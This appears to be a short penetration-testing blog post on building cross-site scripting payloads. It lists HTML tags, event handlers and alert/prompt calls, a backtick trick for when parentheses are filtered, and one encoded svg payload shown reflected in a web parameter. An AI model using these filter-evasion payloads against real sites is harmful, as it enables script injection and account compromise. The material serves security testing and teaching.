‘Try-Harder’ for XSS

Frans Hendrik Botes
May 16 · 4 min read

Enumerating

Image from the git site.

Constructing XSS

{TAG}{EVENT}={PAYLOAD}
script
img
a
body
script
html
meta
xml
object
etc.. etc..

EVENT

events on(load|click|error|show) 
onclick
ondblclick
onmousedown
onmousemove
onmouseover
onmouseout
onmouseup
onkeydown
onkeypress
onkeyup
onabort
onerror
onload
onresize
onscroll
onunload
onsubmit
onblur
onchange
onfocus
onreset
onselect
onMoveOn
onauxclick
oncontextmenu
onmouseleave
ontouchcancel

Payload

write(1)
confirm(1)
alert(1)
prompt(1)
Simple variation if () is blocked. Pay Attention now `` is just as effective.write`1`
confirm`1`
alert`1`
prompt`1`
gridview=%27&’/>%20<svg/onauxClick%3D”alert`HackerOne`”</svg>=’&asd
We can see the payload reflected correctly.

Frans Hendrik Botes

Written by

OSCP, CISM, CISA, CRISC

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade